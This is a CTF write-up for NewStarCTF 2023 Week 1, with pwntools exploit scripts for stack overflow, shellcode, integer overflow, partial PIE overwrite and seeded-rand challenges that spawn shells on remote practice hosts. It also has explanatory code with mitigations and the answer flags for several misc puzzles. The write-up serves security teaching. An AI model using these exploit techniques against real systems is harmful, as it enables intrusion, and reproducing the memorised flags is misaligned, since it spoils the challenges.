NewStarCTF 2023 Week1

pwn:

ret2text:

A simple stack overflow: no canary and no PIE, and there is a backdoor function, so overflow the buffer and return to the backdoor address to get a shell.

exp:

```python
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./ret2text')             # local debugging target
p=remote('node4.buuoj.cn',26822)    # remote target; overrides the local process above
elf=ELF('./ret2text')

# helper shorthands (the author's usual template; not all are used here)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

# 0x28 bytes of padding reach the saved return address; overwrite it with the backdoor address
sla('Show me your magic\n',b'a'*0x28+p64(0x4011fb))

p.interactive()
```

ezshellcode:

No sandbox or similar protection. The allowed input length is long enough, the input is written to 0x66660000, that region is mapped with full permissions, and at the end the program jumps to 0x66660000 and executes it. So writing shellcraft.sh() there is enough to get a shell.

exp:

```python
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./ezshellcode')          # local debugging target
p=remote('node4.buuoj.cn',28654)    # remote target; overrides the local process above
elf=ELF('./ezshellcode')

# helper shorthands (the author's usual template; not all are used here)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

# the input is copied to the rwx page at 0x66660000 and then executed
shellcode=asm(shellcraft.sh())
sl(shellcode)

p.interactive()
```

newstar shop:

Integer overflow. You can only get a shell by buying the shell item, which costs 9999 while we only have 100. The balance is an int, but the comparison treats it as an unsigned int, so if we drive the balance below zero we can buy the shell.

exp:

```python
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./shop')                 # local debugging target
p=remote('node4.buuoj.cn',26635)    # remote target; overrides the local process above
elf=ELF('./shop')

# helper shorthands (the author's usual template; not all are used here)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

# menu choices in the order the author used: drive the balance negative, then buy the shell
sl(b'1')
sl(b'1')
sl(b'1')
sl(b'2')
sl(b'3')
sl(b'1')
sl(b'3')

p.interactive()
```
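The comparison bug behind this challenge, as an added example that is not part of the writeup: a balance stored in a C `int` goes negative, the purchase check converts it to `unsigned int`, and a balance of -1 suddenly looks like 4294967295. The helpers below model 32-bit C arithmetic in Python; the prices and the way the balance reaches -1 are constructed for illustration, and `safe_can_buy` is the check a defender would write instead.

```python
# Added example (not the writeup's code): signed/unsigned comparison in a shop.
INT_BITS = 32
MASK = (1 << INT_BITS) - 1

def to_i32(x: int) -> int:
    """Wrap a Python int to a C `int` (32-bit two's complement)."""
    x &= MASK
    return x - (1 << INT_BITS) if x & (1 << (INT_BITS - 1)) else x

def to_u32(x: int) -> int:
    """Reinterpret a (possibly negative) value as a C `unsigned int`."""
    return x & MASK

def vulnerable_can_buy(balance: int, price: int) -> bool:
    """Mirrors `if ((unsigned int)balance >= price)`: the usual arithmetic
    conversions turn a negative balance into a huge unsigned number."""
    return to_u32(balance) >= to_u32(price)

def safe_can_buy(balance: int, price: int) -> bool:
    """Compare in signed arithmetic and reject negative balances or prices."""
    return balance >= 0 and price >= 0 and balance >= price

def deduct(balance: int, price: int) -> int:
    """Subtract as a C `int` would, wrapping instead of raising."""
    return to_i32(balance - price)

def demo(start: int = 100, overspend: int = 101, shell_price: int = 9999) -> dict:
    """Constructed scenario: spend one unit more than the balance, then try
    to buy the shell item with the vulnerable and the safe check."""
    balance = deduct(start, overspend)          # 100 - 101 -> -1
    return {
        "balance": balance,
        "unsigned_view": to_u32(balance),       # 0xFFFFFFFF
        "vulnerable_allows_shell": vulnerable_can_buy(balance, shell_price),
        "safe_allows_shell": safe_can_buy(balance, shell_price),
    }

if __name__ == "__main__":
    print(demo())
```

The fix is not only the signed comparison: the balance must never be allowed to go negative in the first place, so every deduction needs the same `balance >= price` check before it happens.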

p1eee:

There is a backdoor function, but PIE is enabled. There is also an overflow. Debugging in gdb shows that the saved return address and the backdoor function differ only in their last byte, so overwriting just that byte is enough.

Return address:

[screenshot: saved return address in gdb]

Backdoor function address:

[screenshot: backdoor function address]

Because of the stack-alignment issue, the target has to be 0x1269.

exp:

```python
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./p1eee')                # local debugging target
p=remote('node4.buuoj.cn',26772)    # remote target; overrides the local process above
elf=ELF('./p1eee')

# helper shorthands (the author's usual template; not all are used here)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

# 0x28 bytes of padding, then only the lowest byte of the return address is overwritten (-> ...1269)
sa('pie!!!\n',b'a'*0x28+b'\x69')

p.interactive()
```

Random:

The time stamp from time() is used as the random seed, but we can obtain that time stamp ourselves, so the first "random" step is not random at all.

The next step is not under our control: it runs system(command). But when the randomly chosen command is "$1" or "$2", the command is determined by the arguments we supply.

exp:

```python
from pwn import *
from ctypes import *
import time
context(log_level='debug',arch='amd64',os='linux')
p=process('./random')               # local debugging target
p=remote('node4.buuoj.cn',28598)    # remote target; overrides the local process above
dll = cdll.LoadLibrary("./libc-2.31.so")   # same libc as the target, so rand() produces the same sequence
elf=ELF('./random')

# helper shorthands (the author's usual template; not all are used here)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

# seed libc's rand() with the current second, exactly as the target does, and reproduce its number
time_seed=int(time.time())
dll.srand(time_seed)
rand = str(dll.rand())
sla('number?\n',rand)

p.interactive()
```

Run: python random1.py /bin/sh /bin/sh

Then both the first and the second argument are /bin/sh.
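Why the seed leaks the number, as an added example that is not part of the writeup and needs no libc file: this is a pure-Python model of glibc's default rand() after srand(seed) (the TYPE_3 additive feedback generator), restricted to non-negative 31-bit seeds, which is what a Unix timestamp is. Anyone who knows the second in which the program called srand(time(NULL)) computes the same "random" value; the mitigation shown alongside draws the number from the OS CSPRNG instead. The function names and the seed values in the test are my own.

```python
# Added example (not the writeup's code): model glibc rand() to show that a
# time-based seed makes the output predictable, and the CSPRNG alternative.
import secrets
import time

def glibc_rand_outputs(seed: int, count: int) -> list:
    """Return the first `count` values rand() yields after srand(seed)
    on glibc. Only non-negative 31-bit seeds are modelled here."""
    if not 0 <= seed < 2 ** 31:
        raise ValueError("only non-negative 31-bit seeds are modelled")
    if seed == 0:
        seed = 1                          # glibc maps seed 0 to 1
    n = 344 + count                       # glibc discards 344 values while seeding
    r = [0] * n
    r[0] = seed
    for i in range(1, 31):                # initial fill: Park-Miller LCG mod 2^31-1
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, n):                # additive feedback with 32-bit wraparound
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    return [r[i] >> 1 for i in range(344, n)]

def predict_first_rand(timestamp: int) -> int:
    """The value a program running `srand(time(NULL)); rand();` produces
    in the second `timestamp`."""
    return glibc_rand_outputs(timestamp, 1)[0]

def secure_challenge_number() -> int:
    """Mitigation: a challenge number nobody can derive from the clock.
    (In C the equivalent is getrandom()/arc4random(), not srand(time)."""
    return secrets.randbelow(2 ** 31)

if __name__ == "__main__":
    now = int(time.time())
    print("seed", now, "->", predict_first_rand(now))
    print("unpredictable alternative:", secure_challenge_number())
```

The first three outputs for seed 1 (1804289383, 846930886, 1681692777) are the well-known glibc values, which is how you can confirm the model against a real libc.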

misc:

CyberChef’s Secret:

Encoding challenge.

Going by the challenge name, drop it straight into CyberChef:

[screenshot: CyberChef recipe]

It turns out to have been encoded with base32, base58 and base64.

flag:flag{Base_15_S0_Easy_^_^}

机密图片 (Confidential image):

Image steganography.

It is a PNG; run zsteg on it and the flag comes out directly:

[screenshot: zsteg output]

flag:flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

流量!鲨鱼! (Traffic! Shark!):

Packet-capture challenge.

Export the HTTP objects; among the responses with status 200 there is a file named “.ffffllllllll11111144444GGGGGG|base64”.

Downloading it gives an encoded string: Wm14aGczdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

Run it through base64 decoding:

[screenshot: CyberChef base64 decoding]

flag:flag{Wri35h4rk_1s_u53ful_b72a609537e6}
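Peeling nested encodings without CyberChef, as an added example that is not part of the writeup; it serves both "CyberChef's Secret" (base32, base58, base64 layered) and the base64 download above. The layer detector is a heuristic of my own: each candidate decoding is accepted only if its output is printable ASCII, which is what lets it stop at the flag. The base58 alphabet is the Bitcoin one, the sample inputs in the test are constructed, and the function names are mine.

```python
# Added example (not the writeup's code): strip base32/base58/base64 layers.
import base64
import binascii
import string

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B32_CHARS = set(string.ascii_uppercase + "234567=")

def b58encode(data: bytes) -> str:
    """Bitcoin-style base58; leading zero bytes become leading '1's."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out

def b58decode(text: str) -> bytes:
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)     # ValueError on a bad character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body

def is_printable(data: bytes) -> bool:
    """Printable ASCII, allowing the trailing newline many flags carry."""
    return len(data) > 0 and all(32 <= b < 127 or b in b"\t\r\n" for b in data)

def decode_one_layer(text: str):
    """Try base32, base58 and base64 in turn; return (scheme, bytes) or None."""
    candidates = []
    if set(text) <= B32_CHARS and len(text) % 8 == 0:
        candidates.append(("base32", lambda: base64.b32decode(text)))
    if set(text) <= set(B58_ALPHABET):
        candidates.append(("base58", lambda: b58decode(text)))
    candidates.append(("base64", lambda: base64.b64decode(text, validate=True)))
    for name, decode in candidates:
        try:
            out = decode()
        except (binascii.Error, ValueError):
            continue
        if is_printable(out):           # heuristic: accept only text-like output
            return name, out
    return None

def peel(text: str, max_layers: int = 10):
    """Remove encoding layers until nothing decodes to printable text.
    Returns (final_text, [schemes removed, outermost first])."""
    layers = []
    for _ in range(max_layers):
        text = text.strip()
        result = decode_one_layer(text)
        if result is None:
            break
        name, out = result
        layers.append(name)
        text = out.decode("ascii")
    return text.strip(), layers

if __name__ == "__main__":
    # constructed sample: flag -> base64 -> base58 -> base32, decoded in reverse
    sample = base64.b32encode(b58encode(base64.b64encode(b"flag{layered_encoding}")).encode()).decode()
    print(peel(sample))
```

Because a base58 string is also a valid base64 alphabet subset (and vice versa for some inputs), the charset test alone cannot tell the layers apart; the printable-output check is what makes the order of attempts safe in practice.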

压缩包们 (Zip archives):

A base64 string appears:

[screenshot: base64 string]

[screenshot: decoded content]

Presumably a hint for the archive password.

It looks like it should be a zip archive, but the leading bytes have to be changed to “50 4B 03 04”.

Extract flag.zip.

Extraction fails; combined with the six-digit number seen earlier, the guess is that the encryption flag bit was altered. After restoring it, brute-force the password:

[screenshot: corrected header]

[screenshot: password recovery result]

flag:flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
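Checking the two fields the challenge tampered with, as an added example that is not part of the writeup: a minimal parser for the zip local file header that verifies the `50 4B 03 04` signature and reads bit 0 of the general-purpose flag (the encryption bit), plus helpers that restore the signature and set or clear that bit. The sample archive is constructed in memory with Python's zipfile module; the function names are mine.

```python
# Added example (not the writeup's code): inspect and repair a zip local file header.
import io
import struct
import zipfile

LOCAL_MAGIC = b"PK\x03\x04"          # 50 4B 03 04
FLAG_ENCRYPTED = 0x0001              # bit 0 of the general-purpose flag
HEADER_FMT = "<4sHHHHHIIIHH"         # signature + 26 fixed bytes (APPNOTE 4.3.7)

def parse_local_header(data: bytes) -> dict:
    """Decode the first local file header; raise if the signature is wrong."""
    if data[:4] != LOCAL_MAGIC:
        raise ValueError(
            f"bad local header signature {data[:4].hex(' ')}, "
            f"expected {LOCAL_MAGIC.hex(' ')}"
        )
    (_, version, flags, method, mtime, mdate, crc,
     csize, usize, nlen, xlen) = struct.unpack(HEADER_FMT, data[:30])
    name = data[30:30 + nlen].decode("utf-8", "replace")
    return {
        "name": name,
        "version_needed": version,
        "flags": flags,
        "encrypted": bool(flags & FLAG_ENCRYPTED),
        "method": method,                      # 0 = stored, 8 = deflate
        "crc32": crc,
        "compressed_size": csize,
        "uncompressed_size": usize,
    }

def restore_local_magic(data: bytes) -> bytes:
    """Put the PK\\x03\\x04 signature back in front of a damaged archive."""
    return LOCAL_MAGIC + data[4:]

def set_encryption_flag(data: bytes, encrypted: bool) -> bytes:
    """Return a copy with bit 0 of the first local header's flag set or cleared
    (the flag word sits at offset 6, right after the 2-byte version field)."""
    flags = struct.unpack_from("<H", data, 6)[0]
    flags = flags | FLAG_ENCRYPTED if encrypted else flags & ~FLAG_ENCRYPTED
    return data[:6] + struct.pack("<H", flags) + data[8:]

def make_sample_zip() -> bytes:
    """Constructed sample archive (stored, unencrypted) for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("flag.txt", "constructed sample, not the real flag")
    return buf.getvalue()

if __name__ == "__main__":
    good = make_sample_zip()
    print(parse_local_header(good))
    damaged = b"\x00\x00\x00\x00" + good[4:]          # signature wiped, as in the challenge
    print(parse_local_header(restore_local_magic(damaged)))
    print(parse_local_header(set_encryption_flag(good, True))["encrypted"])
```

Note that the central directory carries its own copy of the flag word, so a real repair has to keep both headers consistent; tools that list the archive read the central directory, while extractors check the local header.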

隐秘的眼睛 (Hidden eyes):

Going by the challenge name, this should be SilentEye.

[screenshot: SilentEye decoding result]

flag:flag{R0ck1ng_y0u_63b0dc13a591}

空白格 (Blank spaces):

A pile of spaces and tabs, which means Whitespace. Find a decoder and run it:

Whitelips the Esoteric Language IDE (vii5ard.github.io)

[screenshot: Whitespace interpreter output]

flag:flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}